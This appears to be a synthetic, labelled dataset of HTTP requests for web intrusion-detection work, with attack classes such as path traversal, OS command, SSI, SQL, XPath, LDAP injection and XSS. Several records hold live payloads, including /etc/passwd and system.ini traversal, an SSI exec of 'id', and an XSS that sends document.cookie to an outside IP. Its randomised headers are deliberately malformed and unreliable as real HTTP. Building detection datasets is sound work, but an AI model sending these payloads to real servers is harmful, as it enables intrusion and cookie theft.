Cookie: uytsnaeasiulot=nane9ripm0o
Cookie2: $Version="180"
Date: Sat, 10 Jan 04 16:04:26 CET
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: osOsoea
From: aylyre@iNsirre.it
If-Modified-Since: Tue, 29 Jan 08 04:08:17 CET
If-Unmodified-Since: Mon, 02 Jul 07 23:15:02 UTC
If-Match: *
If-None-Match: ".bYgv1BA4ZQP4n5M"
If-Range: Fri, 26 Aug 05 07:49:20 UTC
Max-Forwards: 44
MIME-Version: 4.9
Pragma: no-cache
Authorization: NTLM ZW5hZmVlbm9yYU9mbXNuZ256M1llZTRvSml6dG9GcjZpcHh0c2VDb3l0bg==
Referer: /rohqqaz9/ienRv4h/nvtiukx2.asmx
TE: chunked,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.9 (Machintosh; U; PPC 4.9; mn-cg; rv:6.6.0) Gecko/97760864
Via: eae/2.8 www.0p9a.htm, HTTP/5.6 37.124.9.63
Transfer-Encoding: deflate
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

5ontr=at&IaL=iie6&ii=42520&Ln=esffdl/nf1/r7yu/child::node()[   position()=6]     |   ta/8is0/Ntmqo/child::text()[position()=06]     or     's6tu'=   '&nNhvbu8ce5db=66&kdpfr0c=nndetala4onode0A

End - Id: 48505
Start - Id: 36277
class: PathTransversal
GET /tag9eoysodgseeen/eYdVeF/nwwoter/jd/tRbt6dtm/ewcek5lIjar3U/cW9nB_@COp5oVrZ/E4FHMSVfaopt9e/CeTinibZhJptmpIkM/reeyalr3TsaaaeQ/tudteEnnDm99lcper/5qTiZ.cfm?rnonva=miarinuo4c&OVSprocessing-instructionY=%2Fetc%2Fpasswd HTTP/1.1
Host: 246.251.97.141
Connection: tserad
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4781
Client-ip: 117.40.148.200
Cookie: TtleHho8edth=ncUbvxu.GrH;37=itsGe;d4t9iRlijkzt=' s7Ee;TmHgYWpsCO21=95962317
Cookie2: $Version="13"
Date: Wed, 20 Oct 04 02:49:46 CET
ETag: W/"9BVqFjumZrGDUWhR"
Expect: eeoeO=e3rsdt9
If-Modified-Since: Thu, 22 Jan 04 08:49:29 UTC
If-Unmodified-Since: Tue, 20 Mar 07 14:11:48 CET
If-Match: "X-Yv8sav9fTbMZeV"
If-None-Match: "10VRY0GGsC.J-tBl3In"
If-Range: Wed, 19 Sep 07 04:56:44 UTC
Max-Forwards: 5987
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: syto ojead=nreittr
Referer: http://hleedda.fr/etne/CtmnwM/tisi.tar.gz
TE: gzip;q=0.2
Trailer: Accept-Encoding
User-Agent: han2RcW5/7.8.1
UA-OS: Solaris
UA-Pixels: 1458x3720
Via: 0.7 www.utnH.tiff, FTP/4.7 38.80.154.241
Transfer-Encoding: compress
Upgrade: t6a9mC/0.8, isrjmh/3.6, Wb7h6/0.9
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36277
Start - Id: 36665
class: OsCommanding
GET /zoa3hkttoentt3/ibHP/t3msgciMedistPt/fa/cnaprrEdremk/etauARIeh5tsfeietob4/s4B87_Y0.IgvmLz4gEpY/eiq@/c6@@Lbq.png?eeFaieagyt=176.163.8.21++++%7C+dir%2Bc%3A%5C&sh2a=0+Mi&toyemeistatso=od0%29Tterg&r4RtaedlGcc85E=8Eun33sn89&linkSccat-_e=6859616&nE7dbhpa=eCboot.inihbpsodipboot.inia+tsnwp HTTP/1.1
Host: 54.1.150.126:80
Connection: keep-alive
Accept-Charset: *;q=0.7
Accept-Language: *;q=0.4
Cache-Control: max-age=84
Cookie: eefh4cSihmx=cleyncrewttnAe
Date: Mon, 28 Jul 08 13:46:01 UTC
ETag: W/"sizk7E0IO3whO7m18.4"
If-Match: *
If-Range: *
Proxy-Authorization: Basic OGQ1UmlxOmxiZGVhZQ==
Authorization: Basic aWZSaWRkZnM6eGFpYXFu
Referer: /8Ego4/wsEasEh/alhi/emi01/kuiae.asmx
User-Agent: Mozilla/2.2 (Windows; U; Win 9x 4.8; sr-nz; rv:8.7.9) Gecko/39703103
Via: HTTP/2.7 240.18.144.237:494
Transfer-Encoding: mthnd
Warning: 021 www.inh3tr0.js "iqgaes" 

null

End - Id: 36665
Start - Id: 39600
class: SSI
GET /iiI1IgokNDMW2jv/iewven2o9eal/oKmYKXS4eeIfCZq/a@e_mG5BMqLCwE/bgsound.passwdW0cDXG/a7@b@p2TTYYEXl/0KOJgXG-uTRTSjXgN/tp7t/LPoM-y1Dzande_EE/TERdropA2XDB8JKmSJ.asmx?f9rqnttowt=a&cihaoieev4im=execMsamtaiframe%3Eho9e8+%3Ad%5B&pttddfrrrSn=0187&-0u4=ubgsoundct&f0so1t5x=%3C%21--+++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&kvupdateGandxQyaccess_log4=3731&aZsV@BkN@=nbaaeaevar&0t=ahhoe&otetioftnoawau3=72530319&WHwhereEqVkcwdOe=15drowk&m5Fs12ssuvuiy=kcO8between&4ngNdg8Ls8yr=r%3CHeyai+dRh HTTP/1.0
Host: www.hahImm.com
Connection: close
Accept: */*
Accept-Charset: x-mac-greek, iso-10646-ucs-2, windows-1250;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=5713
Client-ip: 239.19.170.214
Cookie: ioodn7=ie;0tamm=01268;xg6FEbin=tilexeclcy8sae eehlsu
Cookie2: $Version="046"
Date: Sun, 22 Jun 08 08:23:18 GMT
ETag: W/"oVLo4-iYAWfQ2T33"
Expect: 100-continue
From: k4wcg@aEdi7a2.de
If-Modified-Since: Thu, 01 Dec 05 06:19:50 CET
If-Unmodified-Since: Sun, 15 Apr 07 24:13:26 GMT
If-Match: "Q5nGeuFDN-Co5fSsduu"
If-None-Match: "CLWXC_Ebp..axSeHsH"
If-Range: Tue, 16 May 06 24:25:15 UTC
Max-Forwards: 594
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic UmV1ZW5yZWc6b2VqZHJn
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: http://pyexs5za.be/seolzm9.gz
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: Mozilla/2.3 (compatible; Konqueror/2.6; Mac OS X; ieei3ati; aohl)
UA-CPU: PowerPC
UA-Disp: 7073,179,8
UA-OS: Win9x
UA-Pixels: 1841x260
Via: 8.9 www.Ap2Rh3wE.tiff, 3.6 105.138.12.231:9, 5.8 www.reqI.html:65967
Transfer-Encoding: deflate
Upgrade: t8veon/3.4, o1M/1.3, ooayr/1.5, edmt/1.1, ecik/3.7
Warning: 852 134.152.169.139 "ano4rrnmet8s13t" "Mon, 26 May 08 01:24:12 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 51537032626
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39600
Start - Id: 49309
class: XPathInjection
GET /itq24fvUSd3VC3Z/kL/wi.xxqV/tJ/ngyn5yrositj/dihw7eIlh0wnnm8i/o9TlEH1ASQ.sh?asaew=enpn8&pA34mVjqi05v=ejkHEhh&yfzclret=Pyvj2j&sd=%3D2rcplsao8eaceur%3A%2BrEo&ihPitw=hdnadhrnarw&zraossosoehr5a=s_iahklZ_Pe&Oh3naini9odpiOg=d7&ooRstteile8t=933389&pkht0edOOuPydz=76397+or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++8949%3D HTTP/1.1
Host: 92.186.218.65
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.5, deflate;q=0.2, identity;q=0.5, identity, gzip;q=0.6
Accept-Language: ot4-a
Cache-Control: atbbspi='eh0'
Client-ip: 160.6.170.73
Cookie: lnu=rKG;ro4=genenoiudnshyma;Qnph-So=01 seZoeval21;wUi1eynli=422;.aKwmVmOQWhC=7ro;r2G5T3kxp_locationAqC=os8KsRtusoY
Cookie2: $Version="01"
Date: Fri, 09 Jan 04 10:32:56 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Wed, 22 Jun 05 21:26:43 CET
If-Unmodified-Since: Sat, 28 Mar 09 06:34:40 CET
If-Match: "BWbgw41M@d1TKoR"
If-None-Match: *
If-Range: Wed, 06 Feb 08 19:08:55 GMT
Max-Forwards: 6
MIME-Version: 9.1
Pragma: lwr='lh'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 32-,-2376,11-22251
Referer: /6wnfqe9/tdtr/1xtdsRs5.tiff
TE: chunked,trailers,chunked
Trailer: Upgrade
User-Agent: Mozilla/8.1 (X11; U; Solaris 3.8; e5-d0; rv:9.2.7) Gecko/04301787
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: 8.7 www.R8ag.htm
Transfer-Encoding: nnfi
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 623 193.252.199.121 "khrNsixEqbqewainsMhL" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 8829334144305
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49309
Start - Id: 40156
class: SSI
GET /eNfwsuuB@bmgF8lOG8H_/sbhua/oDD.php4?nhat4ziousoufdn=%3C%21+++%23%3C%21--+++++%23exec++++cmd%3D%22id%22--%3E&7BACczqnLVF=lt&ZrupdatehAKgzpassthrubw=5 HTTP/1.0
Host: www.t9asoiitn2.be
Connection: moLco
Accept: */*
Accept-Charset: x-mac-cyrillic, macintosh, cp-936, hz-gb-2312;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: yre-oet;q=0.6, oq-tyts;q=0.9, OdQ-aaslecaf;q=0.5
Cache-Control: only-if-cached
Client-ip: 163.65.44.55
Cookie: mznOmtiec2e=oqiuj d sfshutdown]ni;cm9oI=fg4nDtnah0e
Cookie2: $Version="8"
Date: Sat, 15 Nov 08 20:33:53 CET
ETag: W/"fwPq9i.9FDenawS"
Expect: t3ettda=ktisluei;iw3hm
From: stce@ygsk.st
If-Modified-Since: Sat, 27 Nov 04 02:49:47 UTC
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 4
MIME-Version: 1.5
Pragma: 3aAre='tr'
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: teeta oybqtth=we3ig9Q
Range: 728-,7-688430
Referer: http://tobsmr.it/mStebod/l6yi/ielish/acvteis/obyo2tr.wmn
TE: trailers
Trailer: Warning
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 6.8; eI-8f; rv:1.8.8) Gecko/25572565
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: FTP/5.8 www.42Nn.gif:32
Transfer-Encoding: deflate
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40156
Start - Id: 41252
class: SqlInjection
GET /tfpUGZ97vA@xAm40/Uh/Oraiaibhsh04.gif? HTTP/1.0
Host: www.urhhsaidn.com:42
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: or   0<>(select     count(*)   from   ttsjeae8)
Cache-Control: min-fresh=217
Client-ip: 54.17.66.240
Cookie: csy4Dr=oTeaZan;Xejresuit=ore
Cookie2: $Version="78"
Date: Wed, 05 May 04 05:07:58 CET
ETag: W/"S9Z8LZskFpYVZo2x"
Expect: 100-continue
From: YipHgse@Wh0aus.de
If-Modified-Since: Fri, 01 Oct 04 11:42:27 UTC
If-Unmodified-Since: Fri, 21 Jul 06 19:29:02 UTC
If-Match: "dDkviAB7vacA@7Np"
If-None-Match: "9ot@EsXAGipBvI@F"
If-Range: Fri, 14 May 04 12:32:40 UTC
Max-Forwards: 1378
MIME-Version: 4.7
Pragma: d='Ioemim'
Proxy-Authorization: Digest nc=Bba58bDA
Authorization: Basic cnNhRW5uZWQ6ZGg4ZA==
Range: -3431,974442-
Referer: /ghuEasDn/hebsV.cfm
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 2.8; fo-b6; rv:1.6.2) Gecko/53306452
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 921x845
Via: FTP/0.3 www.hlTht.js, 7.6 25.207.142.49, 5.1 248.51.182.230
Transfer-Encoding: ylis; aysjsa=eltb
Upgrade: tno/0.7, leolp/4.5, ixwe/8.3
Warning: 831 www.esasaCu.tiff "ihoEfoer" "Fri, 16 Oct 09 13:38:25 CET"
X-Forwarded-For: 119.121.155.105
X-Serial-Number: 43432074729165077
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41252
Start - Id: 45440
class: PathTransversal
POST /dFY8-qE5ku/6lWgJ_/oo4paS8s/tnndnmmRepdy.php4? HTTP/1.0
Content-Length: 157
Content-Language: 9tafhncf,ienn,iteDa
Content-Encoding: deflate
Content-Location: /3RgtiTrr/tpslda/ertienan.sh
Content-MD5: UXZzb0t1cmljemVhbnJuZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Jul 08 16:54:55 UTC
Host: www.aeo0n.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic;q=0.6, x-mac-arabic
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=60
Client-ip: 112.92.61.252
Cookie: jdkeIyEtSislcS=t8|;ds=hoxhonullt nupdatehttpe10gar ;hAxqeh9en=9k-psev+ t;JzgKdVdbC=zh_C22W3-I.0;miehlubhaeE=04;HwPNoe=52
Cookie2: $Version="192"
Date: Tue, 04 Jan 05 22:24:27 GMT
ETag: W/"k.KpTyIGNzkzzYks"
Expect: 100-continue
From: wiio@Osrnrd.com
If-Modified-Since: Wed, 12 Jan 05 19:22:27 CET
If-Unmodified-Since: Wed, 19 Jan 05 14:05:51 UTC
If-Match: *
If-None-Match: *
If-Range: "Qg5BMj6hf-QZvX9T"
Max-Forwards: 8
Proxy-Authorization: NTLM ZXJ5ZHIxaG5zZWt1aGJ0c1NlYlRlaWlmbmlzVHNlQ21nQXR0bQ==
Authorization: gstur fsie=iBc9
Referer: http://www.itju5.org/jyriua/dornz.jpg
TE: trailers,chunked;q=0.4,chunked
Trailer: TE
User-Agent: seEonnyeo/6.8
UA-Disp: 6378,1062,32
UA-Pixels: 9746x932
Via: 6.2 www.ceool.css, 3.8 51.165.173.215
Transfer-Encoding: deflate
X-Forwarded-For: 173.42.173.213
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fbNJyvarWV5xterm=ff&qoEnS1exsubh=doRErFgnkm-S&99ns5saiohiTA=e(nuif9&evniomyTr=%u 04o&rt=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini

End - Id: 45440
Start - Id: 47716
class: XSS
GET /hi2b71lol5iiaoe0n/lNIttaoadyedirldn/Efic/17VfD6Dtb6daT16/eD.ks6t2/Hhttps7xterm-_El2Rrwindow.openwindow.open/ErjciEst0ielaahngpe/sdE4uee/RHnFzwP2wgetxformpaccess_logps.jpg?itaoE=Est&moizeatgiNlaro=t-pAo4M&SU2a2otweeee=0o&oeanrs=TqrEi+++%22+++style%3Dleft%3Aexpression%28alert+%28%22y.re%22%29%29++alt+++%3D+++%22&aJidetlnir=wK2o HTTP/1.0
Host: 186.46.228.134
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.2, identity;q=0.0, compress, compress;q=0.9
Accept-Language: eI-empE;q=0.1, eshellxb-ni;q=0.9, pblijr-3in1
Cache-Control: min-fresh=7180
Client-ip: 245.204.137.49
Cookie: HeeamatrenbnE=659
Cookie2: $Version="6"
Date: Sat, 20 Mar 10 09:15:54 CET
ETag: "o8srXj_tTzX-96_kyD"
Expect: eAkt=es3Stmno
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Tue, 02 Nov 04 09:16:53 CET
If-Unmodified-Since: Mon, 13 Dec 04 11:24:05 GMT
If-Match: "BYTrcd.j4UI.-dy"
If-None-Match: "gzKqJlOfF.bFpsguW."
If-Range: Mon, 17 May 04 01:21:28 CET
Max-Forwards: 415
MIME-Version: 1.4
Pragma: DLjs='tiI'
Proxy-Authorization: Digest realm
Authorization: NTLM b2lyb3Rzb2hiYXBpbGlhbkxBZ2hkdWVybWx5b2hjdnNyZXJjZVRoc2F0aEdqaU8=
Range: 2174-,56-,-57382
Referer: /ltasa2/tostiu/fiPo3kln.pl
TE: chunked;q=0.6
Trailer: Date
User-Agent: Mozilla/4.9 (compatible; MSIE 1.9; Win 9x; yewttx; n0Bdjrri0; dM1BmC)
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: 6.0 www.gem9.js, 4.9 68.33.210.1:260, djl/9.9 www.m5ord1.html
Transfer-Encoding: deflate
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47716
Start - Id: 47844
class: XSS
GET /oWGgdb5tiEmg/9FPX6IGQyTe/g4/nneXAon/apbg3Ijdi/1trmbommzUreymef/li.nsf?XITIQANU=%3Cimg+src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F231.0.210.169%2Fisch.php%27%2Bdocument.cookie%29%3B%5D%7D%3B+%3E&la=rhERfitef&otil=aTg HTTP/1.0
Host: www.6snT.cz:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: tttHorot-g, fd-s
Cache-Control: no-transform
Client-ip: 38.125.73.120
Cookie: gTeoepa=e9eje esuy2sL;v9NTE4=aXe5Y1hy;dIeej=070869
Cookie2: $Version="459"
Date: Sun, 20 Jun 04 02:12:38 UTC
ETag: "Mj8hzIM2acR3T68"
Expect: er7hdEG=yegd6jr;z1nte=wyzEmd
From: rntaoh@dim7.fr
If-Modified-Since: Wed, 26 Dec 07 03:45:09 UTC
If-Unmodified-Since: Mon, 29 Aug 05 15:53:09 UTC
If-Match: "yumdA@uyDW-Z.RJC"
If-None-Match: "aLYIcWEPWi_dKNNPXwCk"
If-Range: *
Max-Forwards: 70
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZWhOM3V1eDplckx0bnM=
Authorization: Basic Z2JzbmQ6ZW51cjEw
Range: 035-1,0779-,77-
Referer: /orho/hhdl6/itSt/irsh6o.php4
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/4.2 (Windows; U; Win 9x 4.2; tn-nm; rv:8.2.1) Gecko/47376972
UA-Disp: 4309,162,32
Via: FTP/1.4 www.gwls.shtml
Transfer-Encoding: identity
Upgrade: Xtfkh/8.2, Oni/6.3, dia/4.0, rase/7.9
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 98.250.156.118
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47844
Start - Id: 38899
class: LdapInjection
GET /ent/oMGaOLwc9EVn/sWWBDpkgJ8/d95OV@KAe4Ws7Gc/uw/ed/Emmo5Ikbeh6.bin?noldecanfx4hn=5+hhs0o%3A%27ae8hTcmd%5Bgshutdownfn&0yec=haTS0YMpbhTF&mh5hfAoer3=Tcmne%3Cuprnfn9&qNIrqmwe0oe3=itzgrformiut&Tpahpoeajewje=iiy&qmd=%29++%28+%7C++++%28+++cn%3D*o+%27brien*++++%29%28mail+%3D*o++%27brien*++++%29++&ihiqntdDbyxuaL=%3Crijh&oz1Rnetcat=6&brpaoco7kkk84ou=2asdhhsts32&KVaEk=0nOq+LpOTc&JcHnaTru=rCl+tu HTTP/1.0
Host: 44.91.75.42
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-5;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Cookie: U1Ldf=tDo8
Date: Wed, 09 Aug 06 04:49:07 UTC
ETag: W/"2GEamMx-ggUI9_T@t"
Expect: fnIaiakT
If-Unmodified-Since: Wed, 03 Mar 04 18:11:01 GMT
If-Range: Fri, 17 Nov 06 15:17:21 UTC
Max-Forwards: 3
Pragma: no-cache
Authorization: Basic bWxvd2U6ZTBvbmg=
Range: 423-568,877941-960,834220-453
Referer: /osniMchn/igmx.ace
TE: trailers,gzip;q=0.2,trailers
Trailer: Connection
User-Agent: lefhehahe/9.8.2
UA-OS: Solaris
Via: HTTP/4.6 237.228.72.177, 2.1 158.140.66.100:3120, HTTP/0.9 59.86.37.247:6
X-Serial-Number: 99898684535119255

null

End - Id: 38899
Start - Id: 49167
class: XPathInjection
GET /gUpyjfersFgit/f7t1arG47TFawcy.js?LVdeleteB_=32569733&egaMifiseeniSto=37933127&4umv1elondt=ns%2Fqu%2Frrdbt%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D5%5D+or++++%272ijmtndo%27++%3D+%27&jl7w=27796&elsUohRfbahstap=uip_3L&ey=%29%3F&unno=fsctaiaaeNd&cw=56&nmieua=Resqwm&_BZtGYOcB-copyN=43&mhraE=sqLQU-QufIV&usnm=d0ihileonrlI&oehtO=4swrweci2ntmcy8edy&8Nso=window.open%3Arcprl-Rjyoiopt%28mLEnlink%40 HTTP/1.0
Host: www.4gzao20yta.net:80
Connection: close
Accept: video/quicktime, text/*, application/*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, identity;q=0.9, gzip;q=0.7, deflate, compress
Accept-Language: tfw-nrbcwpi
Cache-Control: no-store
Client-ip: 38.175.250.11
Cookie: oehS=neTchIntcaixartmy;2dnhteeee6Yrp=0;w2et= eat
Cookie2: $Version="2"
Date: Mon, 16 Apr 07 13:26:16 GMT
ETag: W/"VjavY-udlIsPEF8K8Bw"
Expect: enssl=tort;giHeab=zaoEd
From: esgt1xrh@tidc.com
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Tue, 15 Apr 08 10:47:56 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Mar 08 08:39:05 UTC
Max-Forwards: 76
MIME-Version: 5.8
Pragma: snnadbwy=rrmq
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic c3lscWhuZTpzbzdp
Range: -441207,31726-,-3
Referer: /etiMtpoi/nnhn5n.swf
TE: trailers,trailers,deflate;q=0.6
Trailer: Accept
User-Agent: Mozilla/3.8 (Machintosh; U; Mac OS X 3.0; ns-re; rv:7.9.7) Gecko/22742563
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 290x3654
Via: 9.4 www.twQntldn.gif
Transfer-Encoding: compress
Upgrade: rMm/8.7
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 887943993
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49167
Start - Id: 45618
class: PathTransversal
GET /dbaq.5dGsHz/tR-i/ownoeoshid/aevtket7tt/s3ttcDsh7x/Etto6ainiEso7Stinj/ofintGwaduenen4/zMO26A0vJXmavMGta/lf5BjCAKY5/3MQxnn.php3?o3eeqmeli5Lgse=gnori8t22oU&nseirsw=h9tu+i2&ttsaemRieg1=8&ecyyutcurerteo=tob&TqfL@hIhtaccesXL=mtr&tie=eofimgg&bgo3sie2trnbl=1&krc7enom=m5tWjzZrL%40&uwftss=je+h&i0nr36aon=llwinntbHllununoo%24&i9i=cITIfLaqpB&seinuwgAIGy=wfrkgH77lten&nFPT-s8P=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&cb3nbaxuf=dymtloEEey&eurmu61wo0Fo=eeqfsa HTTP/1.1
Host: 160.160.29.33
Connection: keep-alive
Accept: application/zip, video/mpeg
Accept-Charset: iso-2022-jp, cp-932;q=0.3
Accept-Encoding: 
Accept-Language: pas1setb-gsner;q=0.8, icehsx-ii0lernr;q=0.1, hr6lhm-u;q=0.8, rss-hDwsmnrt
Cache-Control: rwem='neau'
Client-ip: 54.187.183.145
Cookie: s9tSp0a6=s
Cookie2: $Version="41"
Date: Thu, 17 Feb 05 18:38:59 UTC
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: aieelt@lnoh1ttGc.st
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Thu, 29 Mar 07 04:44:01 CET
If-Match: "Uw2GB2LmNt@_HwBz6"
If-None-Match: *
If-Range: Fri, 31 Dec 04 15:33:29 CET
Max-Forwards: 82
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: NTLM aGxhMDhuc3R2cWRsYXNkNGhuZ3pFdDdkandkdGllbnNSRWxmMm1hZWQ=
Range: 942-,71595-5
Referer: http://www.enhys097.be/e6ir/ibeNM/onrhtos.js
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.2 (Windows; U; Windows NT 1.1; Ao-Rr; rv:4.7.8) Gecko/94862512
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: eiSs
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 45618
Start - Id: 35894
class: XPathInjection
POST /aD8/rmrwiIrfdgk/iopoaeotppa/3X8dOjQhlqS.swf? HTTP/1.1
Content-Length: 293
Content-Language: otLraa
Content-Encoding: gzip
Content-Location: /2nssri.bin
Content-MD5: eWxjZmd4c290ZWFkRHRwOA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Aug 08 15:33:10 CET
Last-Modified: Tue, 22 Dec 09 20:05:14 CET
Host: 70.212.135.53
Connection: close
Accept: text/xml, audio/*, video/mpeg;q=0.5
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity
Accept-Language: 8lel-tepatk, heU7ETi-4tsdtls9, s2eknovr-bu;q=0.1, f-e;q=0.5, 2-teu
Cache-Control: no-transform
Client-ip: 81.81.211.202
Cookie: oatisnyacn4=tDaz
Cookie2: $Version="92"
Date: Sat, 06 Jun 09 05:00:17 GMT
ETag: W/"5qAITUoanYbWZqC"
Expect: 100-continue
From: sloeldwe@xNeaihyz.uk
If-Modified-Since: Tue, 20 Oct 09 02:49:53 UTC
If-Unmodified-Since: Wed, 25 Oct 06 12:35:41 UTC
If-Match: *
If-None-Match: *
If-Range: "kWSFHgh03EUrieQen"
Max-Forwards: 08
Pragma: no-cache
Proxy-Authorization: NTLM aXN0aWVyZW9nYWFwMnRhZXFheXRlOXB0czdiaGFhczVEZWFtb2xWaWxvYXJpbWNz
Authorization: Basic dWUwN2U6ZTJ0YjVzcg==
Range: -23690,93-568748,-273092
Referer: /n1mnb/vicu1ro/znEute/dndi/yeIm.dll
TE: gzip;q=0.4,deflate;q=0.2,gzip
Trailer: If-Modified-Since
User-Agent: 65     or  count(path/child::node()[position()=((i+j+k+l+1)]  | path/child::*()[position()=(k+1)])=1  or   19582=
UA-CPU: PowerPC
Via: 5.9 www.oiEfs.htm, HTTP/4.6 www.powntun.js
Transfer-Encoding: compress
Upgrade: eriHhs/7.6, efsot/0.3, oHnr/4.8, d3rh/5.5, enaeO/2.1
Warning: 424 www.xto8ris.gif "1ioilnehhryaDn5sGe" "Sat, 21 Feb 04 10:37:48 GMT"
X-Forwarded-For: 174.27.30.162
X-Serial-Number: 503350081562336
----: -----------------------------------

